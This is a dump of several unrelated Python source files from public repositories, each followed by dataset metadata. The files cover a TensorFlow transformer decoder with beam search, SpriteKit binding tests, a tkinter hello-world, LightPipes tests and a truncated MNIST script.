print np+"\t"+str(len(set(tf_dic[np])))
def parse_body_abstext(path):
doc = parse_doc(path)
content = doc.select('sec p')
# abstext = doc.select('abstract')[0].get_text()
ps=[]
for p in content:
ps.append(re.sub(r'\s+'," ",p.get_text()))
return " ".join(ps)
def score_therapies(df_path,tf_path):
df_dict=defaultdict(int)
tf_dict = defaultdict(int)
for line in open(df_path):
splits = line.split("\t")
therapy = re.sub(r'\s+'," ",splits[0].replace("-"," "))
df_dict[therapy]=int(splits[2])
for line in open(tf_path):
splits = line.split("\t")
tf_dict[splits[0]] = int(splits[1])
results=defaultdict(float)
for t in df_dict.keys():
tf = tf_dict.get(t,0.5)
results[t]=df_dict[t]/float(tf)
for k,v in sorted(results.items(),key=lambda x:x[1],reverse=True):
print "{:}\t{:.5f}\t{:}\t{:}".format(k,v,df_dict[k],tf_dict.get(k,0.5))
if __name__=="__main__":
clas = sys.argv[1]
if clas=='ref':
parse_references_with_index(sys.argv[1])
elif clas=='tf':
indexpath=sys.argv[2]
dfpath=sys.argv[3]
nplist = [re.sub(r'\s+'," ",line.strip().split('\t')[0].replace("-"," ")) for line in open(dfpath)]
parse_indexes(indexpath,nplist)
elif clas=='score':
score_therapies(sys.argv[2],sys.argv[3])
| [
"[email protected]"
] | |
804d141858f3dc22514a6b54505eebf25a0e5c38 | e6c65e2e354336a4bea5b6a4ccbccd3682915fe2 | /out-bin/py/google/fhir/models/run_locally.runfiles/pypi__tensorboard_1_12_1/tensorboard/plugins/image/images_plugin.py | 0f7921e81efab27bdfd237ae85d1b4f5e13351ae | [
"Apache-2.0"
] | permissive | rasalt/fhir-datalab | c30ab773d84983dd04a37e9d0ddec8bf2824b8a4 | 3e329fc8b4226d3e3a4a7c23c306a86e7a9ea0de | refs/heads/master | 2021-10-09T05:51:04.593416 | 2018-12-21T18:11:03 | 2018-12-22T05:38:32 | 162,744,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/0ddaa3627472ad9d1367a008236ce2f5/external/pypi__tensorboard_1_12_1/tensorboard/plugins/image/images_plugin.py | [
"[email protected]"
] | |
1487f463b36ac15949892d9d13ee5fa6dc48ad37 | c573cac75d4e34263fa29d3efccb76199be0af98 | /4/A.py | c3fa91a5b7637c8e587fb001b43db17bffc6807c | [] | no_license | se2313se/Ya.algorithms_training | b197a0d1f786b0a250de9420965f48436b92ca6a | c52a0ca53f8a807abc943fa60b5b178754118141 | refs/heads/main | 2023-06-08T23:03:40.853383 | 2021-06-24T17:21:07 | 2021-06-24T17:21:07 | 380,001,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | with open('input.txt', 'r', encoding='utf8') as f:
synonyms = dict()
n = int(f.readline())
for i in range(n):
tempWord, tempSynonyms = f.readline().split()
synonyms[tempWord] = tempSynonyms
synonyms[tempSynonyms] = tempWord
print(synonyms[f.readline().strip()])
| [
"[email protected]"
] | |
5f3b77b8ea7b33ecee62dff19499387e3da1e40e | 63f85ffae77a564ca296777b294ab3e4d2957ce9 | /tfSeq2SeqModels/decoders/transformer_decoder.py | 78583e920e9c7fd481e1b006c929fe6d30e9bc45 | [] | no_license | chenxinglili/eastonCode | 0c89789e2656b9236d773424973d933ac9045697 | 0334a41f6df7bb38a18a6918dfebd189c64395e8 | refs/heads/master | 2020-06-26T10:11:02.112948 | 2019-07-02T13:42:36 | 2019-07-02T13:42:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,892 | py | '''@file rnn_decoder.py
the while_loop implementation'''
import tensorflow as tf
import logging
from .rna_decoder import RNADecoder
from tfSeq2SeqModels.tools.utils import dense
from tfModels.tensor2tensor import common_attention
from ..tools.utils import residual, multihead_attention, ff_hidden
inf = 1e10
class Transformer_Decoder(RNADecoder):
"""ctc's `decoder` where the acoustic model is trained with ctc and the distribution
is shrinked without blank frams. The decoder operates on the shrinked distribution
which is a sequence labeling problem and the training targets are generated by
OCD.
"""
def __init__(self, args, is_train, global_step, embed_table=None, name=None):
super().__init__(args, is_train, global_step, embed_table, name)
# use decoder heres
self.num_blocks = args.model.decoder.num_blocks
self.num_cell_units = args.model.decoder.num_cell_units
self.attention_dropout_rate = args.model.decoder.attention_dropout_rate if is_train else 0.0
self.residual_dropout_rate = args.model.decoder.residual_dropout_rate if is_train else 0.0
self.num_heads = args.model.decoder.num_heads
self.size_embedding = args.model.decoder.size_embedding
self._ff_activation = (lambda x, y: x * tf.sigmoid(y)) \
if args.model.decoder.activation == 'glu' else tf.nn.relu # glu
self.softmax_temperature = args.model.decoder.softmax_temperature
self.lambda_lm = self.args.lambda_lm
def decode(self, encoded, len_encoded, decoder_input):
"""
used for MLE training
"""
decoder_output = self.decoder_impl(decoder_input, encoded, len_encoded)
logits = tf.layers.dense(
decoder_output,
self.args.dim_output,
use_bias=False,
name='decoder_fc')
preds = tf.to_int32(tf.argmax(logits, axis=-1))
return logits, preds
def decoder_with_caching(self, encoded, len_encoded):
"""
gread search, used for self-learning training or infer
"""
batch_size = tf.shape(encoded)[0]
token_init = tf.fill([batch_size, 1], self.start_token)
logits_init = tf.zeros([batch_size, 1, self.dim_output], dtype=tf.float32)
finished_init = tf.zeros([batch_size], dtype=tf.bool)
len_decoded_init = tf.ones([batch_size], dtype=tf.int32)
cache_decoder_init = tf.zeros([batch_size, 0, self.num_blocks, self.num_cell_units])
encoder_padding = tf.equal(tf.sequence_mask(len_encoded, maxlen=tf.shape(encoded)[1]), False) # bool tensor
encoder_attention_bias = common_attention.attention_bias_ignore_padding(encoder_padding)
def step(i, preds, cache_decoder, logits, len_decoded, finished):
preds_emb = self.embedding(preds)
decoder_input = preds_emb
decoder_output, cache_decoder = self.decoder_with_caching_impl(
decoder_input,
cache_decoder,
encoded,
encoder_attention_bias)
cur_logit = tf.layers.dense(
inputs=decoder_output[:, -1, :],
units=self.dim_output,
activation=None,
use_bias=False,
name='decoder_fc')
cur_ids = tf.to_int32(tf.argmax(cur_logit, -1))
preds = tf.concat([preds, cur_ids[:, None]], axis=1)
logits = tf.concat([logits, cur_logit[:, None]], 1)
# Whether sequences finished.
has_eos = tf.equal(cur_ids, self.end_token)
finished = tf.logical_or(finished, has_eos)
len_decoded += 1-tf.to_int32(finished)
return i+1, preds, cache_decoder, logits, len_decoded, finished
def not_finished(i, preds, cache, logit, len_decoded, finished):
return tf.logical_and(
tf.reduce_any(tf.logical_not(finished)),
tf.less(
i,
tf.reduce_min([tf.shape(encoded)[1], self.args.max_len]) # maxlen = 25
)
)
i, preds, cache_decoder, logits, len_decoded, finished = tf.while_loop(
cond=not_finished,
body=step,
loop_vars=[0, token_init, cache_decoder_init, logits_init, len_decoded_init, finished_init],
shape_invariants=[tf.TensorShape([]),
tf.TensorShape([None, None]),
tf.TensorShape([None, None, None, None]),
tf.TensorShape([None, None, self.dim_output]),
tf.TensorShape([None]),
tf.TensorShape([None])]
)
# len_decoded = tf.Print(len_decoded, [finished], message='finished: ', summarize=1000)
len_decoded -= 1-tf.to_int32(finished) # for decoded length cut by encoded length
logits = logits[:, 1:, :]
preds = preds[:, 1:]
not_padding = tf.sequence_mask(len_decoded, dtype=tf.int32)
preds = tf.multiply(tf.to_int32(preds), not_padding)
return logits, preds, len_decoded
def decoder_with_caching_impl(self, decoder_input, decoder_cache, encoder_output, encoder_attention_bias):
# Positional Encoding
decoder_input += common_attention.add_timing_signal_1d(decoder_input)
# Dropout
decoder_output = tf.layers.dropout(decoder_input,
rate=self.residual_dropout_rate,
training=self.is_train)
new_cache = []
# rest block with residual
for i in range(self.num_blocks):
with tf.variable_scope("block_{}".format(i)):
# Multihead Attention (self-attention)
# the caching_impl only need to calculate decoder_output[:, -1:, :] !
decoder_output = residual(decoder_output[:, -1:, :],
multihead_attention(
query_antecedent=decoder_output,
memory_antecedent=None,
bias=None,
total_key_depth=self.num_cell_units,
total_value_depth=self.num_cell_units,
num_heads=self.num_heads,
dropout_rate=self.attention_dropout_rate,
num_queries=1,
output_depth=self.num_cell_units,
name="decoder_self_attention",
summaries=False),
dropout_rate=self.residual_dropout_rate)
# Multihead Attention (vanilla attention)
decoder_output = residual(decoder_output,
multihead_attention(
query_antecedent=decoder_output,
memory_antecedent=encoder_output,
bias=encoder_attention_bias,
total_key_depth=self.num_cell_units,
total_value_depth=self.num_cell_units,
output_depth=self.num_cell_units,
num_heads=self.num_heads,
dropout_rate=self.attention_dropout_rate,
num_queries=1,
name="decoder_vanilla_attention",
summaries=False),
dropout_rate=self.residual_dropout_rate)
# Feed Forward
decoder_output = residual(decoder_output,
ff_hidden(
decoder_output,
hidden_size=4 * self.num_cell_units,
output_size=self.num_cell_units,
activation=self._ff_activation),
dropout_rate=self.residual_dropout_rate)
decoder_output = tf.concat([decoder_cache[:, :, i, :], decoder_output], axis=1)
new_cache.append(decoder_output[:, :, None, :])
new_cache = tf.concat(new_cache, axis=2) # [batch_size, n_step, num_blocks, num_hidden]
return decoder_output, new_cache
def decoder_impl(self, decoder_input, encoder_output, len_encoded):
# encoder_padding = tf.equal(tf.reduce_sum(tf.abs(encoder_output), axis=-1), 0.0)
encoder_padding = tf.equal(tf.sequence_mask(len_encoded, maxlen=tf.shape(encoder_output)[1]), False) # bool tensor
# [-0 -0 -0 -0 -0 -0 -0 -0 -0 -1e+09] the pading place is -1e+09
encoder_attention_bias = common_attention.attention_bias_ignore_padding(encoder_padding)
decoder_output = self.embedding(decoder_input)
# Positional Encoding
decoder_output += common_attention.add_timing_signal_1d(decoder_output)
# Dropout
decoder_output = tf.layers.dropout(decoder_output,
rate=self.residual_dropout_rate,
training=self.is_train)
# Bias for preventing peeping later information
self_attention_bias = common_attention.attention_bias_lower_triangle(tf.shape(decoder_input)[1])
# Blocks
for i in range(self.num_blocks):
with tf.variable_scope("block_{}".format(i)):
# Multihead Attention (self-attention)
decoder_output = residual(decoder_output,
multihead_attention(
query_antecedent=decoder_output,
memory_antecedent=None,
bias=self_attention_bias,
total_key_depth=self.num_cell_units,
total_value_depth=self.num_cell_units,
num_heads=self.num_heads,
dropout_rate=self.attention_dropout_rate,
output_depth=self.num_cell_units,
name="decoder_self_attention",
summaries=False),
dropout_rate=self.residual_dropout_rate)
# Multihead Attention (vanilla attention)
decoder_output = residual(decoder_output,
multihead_attention(
query_antecedent=decoder_output,
memory_antecedent=encoder_output,
bias=encoder_attention_bias,
# bias=None,
total_key_depth=self.num_cell_units,
total_value_depth=self.num_cell_units,
output_depth=self.num_cell_units,
num_heads=self.num_heads,
dropout_rate=self.attention_dropout_rate,
name="decoder_vanilla_attention",
summaries=False),
dropout_rate=self.residual_dropout_rate)
# Feed Forward
decoder_output = residual(decoder_output,
ff_hidden(
decoder_output,
hidden_size=4 * self.num_cell_units,
output_size=self.num_cell_units,
activation=self._ff_activation),
dropout_rate=self.residual_dropout_rate)
return decoder_output
def beam_decode_rerank(self, encoded, len_encoded):
"""
beam search rerank at end with language model integration (self-attention model)
the input to te score is <sos> + tokens !!!
"""
beam_size = self.beam_size
batch_size = tf.shape(len_encoded)[0]
# beam search Initialize
# repeat each sample in batch along the batch axis [1,2,3,4] -> [1,1,2,2,3,3,4,4]
encoded = tf.tile(encoded[:, None, :, :],
multiples=[1, beam_size, 1, 1]) # [batch_size, beam_size, *, hidden_units]
encoded = tf.reshape(encoded,
[batch_size * beam_size, -1, encoded.get_shape()[-1].value])
len_encoded = tf.reshape(tf.tile(len_encoded[:, None], multiples=[1, beam_size]), [-1]) # [batch_size * beam_size]
# [[<S>, <S>, ..., <S>]], shape: [batch_size * beam_size, 1]
token_init = tf.fill([batch_size * beam_size, 1], self.args.sos_idx)
logits_init = tf.zeros([batch_size * beam_size, 0, self.dim_output], dtype=tf.float32)
len_decoded_init = tf.ones_like(len_encoded, dtype=tf.int32)
# the score must be [0, -inf, -inf, ...] at init, for the preds in beam is same in init!!!
scores_init = tf.constant([0.0] + [-inf] * (beam_size - 1), dtype=tf.float32) # [beam_size]
scores_init = tf.tile(scores_init, multiples=[batch_size]) # [batch_size * beam_size]
finished_init = tf.zeros_like(scores_init, dtype=tf.bool)
cache_decoder_init = tf.zeros([batch_size*beam_size,
0,
self.num_blocks,
self.num_cell_units])
if self.lm:
cache_lm_init = tf.zeros([batch_size*beam_size,
0,
self.lm.args.model.decoder.num_blocks,
self.lm.args.model.decoder.num_cell_units])
else:
cache_lm_init = tf.zeros([0, 0, 0, 0])
# collect the initial states of lstms used in decoder.
base_indices = tf.reshape(tf.tile(tf.range(batch_size)[:, None], multiples=[1, beam_size]), shape=[-1])
encoder_padding = tf.equal(tf.sequence_mask(len_encoded, maxlen=tf.shape(encoded)[1]), False) # bool tensor
encoder_attention_bias = common_attention.attention_bias_ignore_padding(encoder_padding)
def step(i, preds, scores, cache_decoder, cache_lm, logits, len_decoded, finished):
"""
the cache has no specific shape, so no can be put in the all_states
"""
preds_emb = self.embedding(preds)
decoder_input = preds_emb
decoder_output, cache_decoder = self.decoder_with_caching_impl(
decoder_input,
cache_decoder,
encoded,
encoder_attention_bias)
cur_logit = tf.layers.dense(
inputs=decoder_output[:, -1, :],
units=self.dim_output,
activation=None,
use_bias=False,
name='decoder_fc')
logits = tf.concat([logits, cur_logit[:, None]], 1)
z = tf.nn.log_softmax(cur_logit) # [batch*beam, size_output]
# the langueage model infer
if self.args.model.shallow_fusion:
assert self.lm
preds_emb = self.lm.decoder.embedding(preds)
with tf.variable_scope(self.args.top_scope, reuse=True):
with tf.variable_scope(self.args.lm_scope):
lm_output, cache_lm = self.lm.decoder.decoder_with_caching_impl(preds_emb, cache_lm)
logit_lm = dense(
inputs=lm_output[:, -1, :],
units=self.dim_output,
kernel=tf.transpose(self.lm.decoder.fully_connected),
use_bias=False)
z_lm = self.lambda_lm * tf.nn.log_softmax(logit_lm) # [batch*beam, size_output]
else:
z_lm = tf.zeros_like(z)
# rank the combined scores
next_scores, next_preds = tf.nn.top_k(z+z_lm, k=beam_size, sorted=True)
next_preds = tf.to_int32(next_preds)
# beamed scores & Pruning
scores = scores[:, None] + next_scores # [batch_size * beam_size, beam_size]
scores = tf.reshape(scores, shape=[batch_size, beam_size * beam_size])
_, k_indices = tf.nn.top_k(scores, k=beam_size)
k_indices = base_indices * beam_size * beam_size + tf.reshape(k_indices, shape=[-1]) # [batch_size * beam_size]
# Update scores.
scores = tf.reshape(scores, [-1])
scores = tf.gather(scores, k_indices)
# Update predictions.
next_preds = tf.reshape(next_preds, shape=[-1])
next_preds = tf.gather(next_preds, indices=k_indices)
# k_indices: [0~batch*beam*beam], preds: [0~batch*beam]
# preds, cache_lm, cache_decoder: these data are shared during the beam expand among vocab
preds = tf.gather(preds, indices=k_indices // beam_size)
cache_lm = tf.gather(cache_lm, indices=k_indices // beam_size)
cache_decoder = tf.gather(cache_decoder, indices=k_indices // beam_size)
preds = tf.concat([preds, next_preds[:, None]], axis=1) # [batch_size * beam_size, i]
has_eos = tf.equal(next_preds, self.end_token)
finished = tf.logical_or(finished, has_eos)
len_decoded += 1-tf.to_int32(finished)
# i = tf.Print(i, [i], message='i: ', summarize=1000)
return i+1, preds, scores, cache_decoder, cache_lm, logits, len_decoded, finished
def not_finished(i, preds, scores, cache_decoder, cache_lm, logit, len_decoded, finished):
# i = tf.Print(i, [i], message='i: ', summarize=1000)
return tf.logical_and(
tf.reduce_any(tf.logical_not(finished)),
tf.less(
i,
tf.reduce_min([tf.shape(encoded)[1], self.args.max_len]) # maxlen = 100
)
)
_, preds, scores_am, _, _, logits, len_decoded, finished = tf.while_loop(
cond=not_finished,
body=step,
loop_vars=[0, token_init, scores_init, cache_decoder_init, cache_lm_init, logits_init, len_decoded_init, finished_init],
shape_invariants=[tf.TensorShape([]),
tf.TensorShape([None, None]),
tf.TensorShape([None]),
tf.TensorShape([None, None, None, None]),
tf.TensorShape([None, None, None, None]),
tf.TensorShape([None, None, self.dim_output]),
tf.TensorShape([None]),
tf.TensorShape([None])]
)
# [batch_size * beam_size, ...]
len_decoded -= 1-tf.to_int32(finished) # for decoded length cut by encoded length
preds = preds[:, 1:]
not_padding = tf.sequence_mask(len_decoded, dtype=tf.int32)
preds *= not_padding
# [batch_size , beam_size, ...]
if self.args.model.rerank:
assert self.lm
with tf.variable_scope(self.args.top_scope, reuse=True):
with tf.variable_scope(self.args.lm_scope):
scores_lm, distribution = self.lm.decoder.score(preds, len_decoded)
scores_lm = self.args.lambda_rerank * scores_lm
else:
scores_lm = tf.zeros_like(scores_am)
scores = scores_am + scores_lm
# tf.nn.top_k is used to sort `scores`
scores_sorted, sorted = tf.nn.top_k(tf.reshape(scores, [batch_size, beam_size]),
k=beam_size,
sorted=True)
sorted = base_indices * beam_size + tf.reshape(sorted, shape=[-1]) # [batch_size * beam_size]
# [batch_size * beam_size, ...]
logits_sorted = tf.gather(logits, sorted)
preds_sorted = tf.gather(preds, sorted)
len_decoded_sorted = tf.gather(len_decoded, sorted)
scores_lm_sorted = tf.gather(scores_lm, sorted)
scores_am_sorted = tf.gather(scores_am, sorted)
# [batch_size, beam_size, ...]
scores_lm_sorted = tf.reshape(scores_lm_sorted, shape=[batch_size, beam_size])
scores_am_sorted = tf.reshape(scores_am_sorted, shape=[batch_size, beam_size])
preds_sorted = tf.reshape(preds_sorted, shape=[batch_size, beam_size, -1]) # [batch_size, beam_size, max_length]
logits_sorted = tf.reshape(logits_sorted, [batch_size, beam_size, -1, self.dim_output])
len_decoded_sorted = tf.reshape(len_decoded_sorted, [batch_size, beam_size])
# return logits, final_preds, len_encoded
return [logits_sorted, preds_sorted, len_decoded_sorted, scores_am_sorted, scores_lm_sorted], preds_sorted[:, 0, :], len_decoded_sorted[:, 0]
def forward(self, i, preds, state_decoder):
"""
self.cell
self.encoded
"""
prev_emb = self.embedding(preds[:, -1])
decoder_input = tf.concat([self.encoded[:, i, :], prev_emb], axis=1)
decoder_input.set_shape([None, self.num_cell_units_en+self.size_embedding])
with tf.variable_scope(self.name or 'decoder', reuse=True):
with tf.variable_scope("decoder_lstms"):
output_decoder, state_decoder = tf.contrib.legacy_seq2seq.rnn_decoder(
decoder_inputs=[decoder_input],
initial_state=state_decoder,
cell=self.cell)
cur_logit = tf.layers.dense(
inputs=output_decoder[0],
units=self.dim_output,
activation=None,
use_bias=False,
name='fully_connected'
)
cur_ids = tf.to_int32(tf.argmax(cur_logit, -1))
return cur_ids, state_decoder
| [
"[email protected]"
] | |
15ebe1a3991b7c2926af485aac68c164facd7718 | adbf09a31415e6cf692ff349bd908ea25ded42a8 | /widgets/hello.py | 1f431dbfab5106918d3f455f654bdbbf17576618 | [] | no_license | cmulliss/gui_python | 53a569f301cc82b58880c3c0b2b415fad1ecc3f8 | 6c83d8c2e834464b99024ffd8cf46ac4e734e7a4 | refs/heads/main | 2023-08-12T22:33:01.596005 | 2021-10-11T12:35:41 | 2021-10-11T12:35:41 | 408,176,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | import tkinter as tk
from tkinter import ttk
# main window is going to be called root
# Tk is creating an object, the main window
# .pack() puts the text into the window
root = tk.Tk()
root.title("hello World")
ttk.Label(root, text="Hello World", padding=(30, 10)).pack()
# tells it to start running and continues until you close your window
root.mainloop()
| [
"[email protected]"
] | |
79060db8148d189e49d71a2fcde2a58110cad683 | d4f05d51568bfda9fb964deba92d9fd599a3dcde | /desing_pattern/factory_method/idcard.py | d696179da0e2206fdb2814b3f87a9e6356415882 | [] | no_license | Fullmoon8507/PythonPracticeProject | 44beba7ce783e5e22429516d39ee96adc1ead785 | 57454099ad67bfe4431ee997fada640fde6ccecc | refs/heads/master | 2020-04-16T23:29:58.907552 | 2017-05-06T07:27:35 | 2017-05-06T07:27:35 | 53,178,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from product import Product
class IDCard(Product):
def __init__(self, owner):
self.__owner = owner
print(self.__owner + 'のカードを作成します')
def use(self):
print(self.__owner + 'のカードを使います')
def get_owner(self):
return self.__owner
| [
"[email protected]"
] | |
8a4d5bed883776ebcd3fcc904288d9add338fef0 | 584f7b51d7cd529448e2fc0147557e26931ab17e | /test_Begin_dtype.py | 94c25b201a1b4bb74e965f1d89a9301ac63f4647 | [
"BSD-3-Clause"
] | permissive | opticspy/lightpipes | 8ca0d2221a1b893de5e51fec9061e90b9145f5f8 | f4ffdedb3ab2f9b5ae5a9a8e37985d2a7f8bb2ef | refs/heads/master | 2023-09-04T19:07:11.376631 | 2023-09-04T15:24:55 | 2023-09-04T15:24:55 | 80,127,706 | 191 | 55 | BSD-3-Clause | 2023-08-23T00:45:33 | 2017-01-26T15:39:28 | Python | UTF-8 | Python | false | false | 572 | py | #! /usr/bin/env python
"""
Script to test the Begin command with dtype option.
"""
from LightPipes import *
import numpy as np
import sys
wavelength = 500*nm
size = 25*mm
N = 3000
N2=int(N/2)
w0=2*mm
print("LightPipes version = ", LPversion)
print("without dtype option:")
F=Begin(size,wavelength,N)
print("type of F:",F._dtype)
print("size of F.field: ",sys.getsizeof(F.field)/1e9," Gbyte")
print("\n")
print("with dtype option:")
F=Begin(size,wavelength,N,dtype=np.complex64)
print("type of F:",F._dtype)
print("size of F.field: ",sys.getsizeof(F.field)/1e9," Gbyte")
| [
"[email protected]"
] | |
dd7bda05324df1c30a70004bdcf169a29b9a972f | b76615ff745c6d66803506251c3d4109faf50802 | /pyobjc-framework-SpriteKit/PyObjCTest/test_skview.py | 96b626096078794678e9693ea10f2b0c41775b58 | [
"MIT"
] | permissive | danchr/pyobjc-git | 6ef17e472f54251e283a0801ce29e9eff9c20ac0 | 62b787fddeb381184043c7ff136f1c480755ab69 | refs/heads/master | 2021-01-04T12:24:31.581750 | 2020-02-02T20:43:02 | 2020-02-02T20:43:02 | 240,537,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,319 | py | import sys
from PyObjCTools.TestSupport import *
import objc
if sys.maxsize > 2 ** 32:
import SpriteKit
class TestSKViewHelper(SpriteKit.NSObject):
def view_shouldRenderAtTime_(self, v, t):
return 1
class TestSKView(TestCase):
@min_os_level("10.9")
def testMethods10_9(self):
self.assertArgIsBOOL(SpriteKit.SKView.setPaused_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.isPaused)
self.assertArgIsBOOL(SpriteKit.SKView.setShowsFPS_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.showsFPS)
self.assertArgIsBOOL(SpriteKit.SKView.setShowsDrawCount_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.showsDrawCount)
self.assertArgIsBOOL(SpriteKit.SKView.setShowsNodeCount_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.showsNodeCount)
self.assertArgIsBOOL(SpriteKit.SKView.setAsynchronous_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.isAsynchronous)
self.assertArgIsBOOL(SpriteKit.SKView.setIgnoresSiblingOrder_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.ignoresSiblingOrder)
@min_os_level("10.10")
def testMethods10_10(self):
self.assertArgIsBOOL(SpriteKit.SKView.setShowsFields_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.showsFields)
self.assertArgIsBOOL(SpriteKit.SKView.setShowsPhysics_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.showsPhysics)
self.assertArgIsBOOL(SpriteKit.SKView.setShowsQuadCount_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.showsQuadCount)
self.assertArgIsBOOL(SpriteKit.SKView.setAllowsTransparency_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.allowsTransparency)
self.assertArgIsBOOL(SpriteKit.SKView.setShouldCullNonVisibleNodes_, 0)
self.assertResultIsBOOL(SpriteKit.SKView.shouldCullNonVisibleNodes)
@min_sdk_level("10.12")
def testProtocols(self):
objc.protocolNamed("SKViewDelegate")
self.assertResultIsBOOL(TestSKViewHelper.view_shouldRenderAtTime_)
self.assertArgHasType(
TestSKViewHelper.view_shouldRenderAtTime_, 1, objc._C_DBL
)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
87df33662bfa4926caa32f3b3fb0907ed1ddbc37 | 32226e72c8cbaa734b2bdee081c2a2d4d0322702 | /experiments/state_distance/optimal_control_with_q.py | e6785e1a4453bcf63958d1b547ffd1074ec35676 | [
"MIT"
] | permissive | Asap7772/rail-rl-franka-eval | 2b1cbad7adae958b3b53930a837df8a31ab885dc | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | refs/heads/master | 2022-11-15T07:08:33.416025 | 2020-07-12T22:05:32 | 2020-07-12T22:05:32 | 279,155,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,763 | py | """
Choose action according to
a = argmax_{a, s'} r(s, a, s') s.t. Q(s, a, s') = 0
where r is defined specifically for the reacher env.
"""
import argparse
import joblib
import numpy as np
from railrl.state_distance.policies import (
SoftOcOneStepRewardPolicy,
TerminalRewardSampleOCPolicy,
ArgmaxQFPolicy,
PseudoModelBasedPolicy,
SamplePolicyPartialOptimizer)
from railrl.samplers.util import rollout
from railrl.torch.pytorch_util import set_gpu_mode
from railrl.core import logger
def experiment(variant):
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', type=str,
help='path to the snapshot file')
parser.add_argument('--H', type=int, default=500,
help='Max length of rollout')
parser.add_argument('--num_rollouts', type=int, default=1,
help='Number of rollouts per eval')
parser.add_argument('--gpu', action='store_true')
parser.add_argument('--argmax', action='store_true')
parser.add_argument('--hide', action='store_true')
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--planh', type=int, default=1,
help='Planning horizon')
parser.add_argument('--discount', type=float, help='Discount Factor')
parser.add_argument('--weight', type=float, default=1.,
help='Constraint penalty weight')
parser.add_argument('--nsamples', type=int, default=100,
help='Number of samples for optimization')
parser.add_argument('--ngrad', type=int, default=0,
help='Number of gradient steps for respective policy.')
parser.add_argument('--mb', action='store_true',
help='Use (pseudo-)model-based policy')
parser.add_argument('--partial', action='store_true',
help='Use partial state optimizer')
parser.add_argument('--grid', action='store_true',
help='Sample actions from a grid')
parser.add_argument('--dt', help='decrement tau', action='store_true')
parser.add_argument('--cycle', help='cycle tau', action='store_true')
args = parser.parse_args()
data = joblib.load(args.file)
print("Done loading")
env = data['env']
qf = data['qf']
if args.gpu:
set_gpu_mode(True)
qf.to(ptu.device)
qf.train(False)
print("Env type:", type(env))
if args.argmax:
policy = ArgmaxQFPolicy(
qf,
env,
sample_size=args.nsamples,
num_gradient_steps=args.ngrad,
sample_actions_from_grid=args.grid,
)
elif args.mb:
policy = PseudoModelBasedPolicy(
qf,
env,
sample_size=args.nsamples,
)
elif args.partial:
policy = SamplePolicyPartialOptimizer(
qf,
env,
data['policy'],
sample_size=args.nsamples,
)
elif args.planh == 1:
policy = SoftOcOneStepRewardPolicy(
qf,
env,
data['policy'],
constraint_weight=args.weight,
sample_size=args.nsamples,
verbose=args.verbose,
sample_actions_from_grid=args.grid,
)
else:
policy = TerminalRewardSampleOCPolicy(
qf,
env,
horizon=args.planh,
constraint_weight=args.weight,
sample_size=args.nsamples,
verbose=args.verbose,
)
discount = 0
if args.discount is not None:
print("WARNING: you are overriding the discount factor. Right now "
"only discount = 0 really makes sense.")
discount = args.discount
init_tau = discount
while True:
paths = []
tau = init_tau
policy.set_tau(tau)
for _ in range(args.num_rollouts):
goal = env.sample_goal_for_rollout()
if args.verbose:
env.print_goal_state_info(goal)
env.set_goal(goal)
policy.set_goal(goal)
path = rollout(
env,
policy,
max_path_length=args.H,
animated=not args.hide,
)
path['goal_states'] = np.repeat(
np.expand_dims(goal, 0),
len(path['observations']),
0,
)
paths.append(path)
tau -= 1
if tau < 0:
if args.cycle:
tau = init_tau
else:
tau = 0
policy.set_tau(tau)
env.log_diagnostics(paths)
logger.dump_tabular()
| [
"[email protected]"
] | |
7539f89d65e13d8d08aa52f5ad2cb95edad6e77c | 572dd7f851ff2f6b39fea8f99199c22260f113df | /user/messages/success.py | b4e779b05fd4003a8e96f5153edf170b46c1ee00 | [] | no_license | SEUNAGBEYE/Flighty | f869f3fb1c1c74bddff9102b11a02411f502dc52 | 46247f93e7f9c83441c3f50eaca2f0d3eaeca96f | refs/heads/develop | 2022-12-13T12:17:58.760670 | 2019-07-29T15:51:36 | 2019-07-29T15:51:36 | 165,585,170 | 0 | 0 | null | 2022-12-08T01:36:58 | 2019-01-14T02:52:46 | Python | UTF-8 | Python | false | false | 172 | py | USER_CREATED = 'User successfully created'
LOGIN_SUCCESSFULL = 'User sucessfully logged in'
PROFILE_UPDATED = 'Profile updated'
USER_RETRIEVED = 'User successfully fetched' | [
"[email protected]"
] | |
82332f085a0ce0530c27abb8493eb16799f8861a | 44e8334e1b17fda7f60d9760f59868a9227e2ab0 | /python-tf/tf2/tf2-10-0-mnist.py | 1510bd8a4542793f25cbb4c7648fb41506d3382a | [] | no_license | MysteriousSonOfGod/python-3 | 47c2aa69a84ba78876c74bc6f2e7e6f3093df1e2 | a303a5284c40f3cb96a8082a1f5ed80773b66336 | refs/heads/master | 2023-02-16T18:21:46.153388 | 2021-01-13T10:55:14 | 2021-01-13T10:55:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | # Lab 7 Learning rate and Evaluation
import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
import images.image
learning_rate = 0.001
training_epochs = 15 # total training data을 한 번 train = 1 epoch
batch_size = 100 # 모든 데이터를 처리하지 않고 처리할 묶은 건수
# 모든데이터가 1000 이고 batch_size 100이면 1 epoch할려면 10번 반복작업이 실행됨
nb_classes = 10
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test_org) = mnist.load_data()
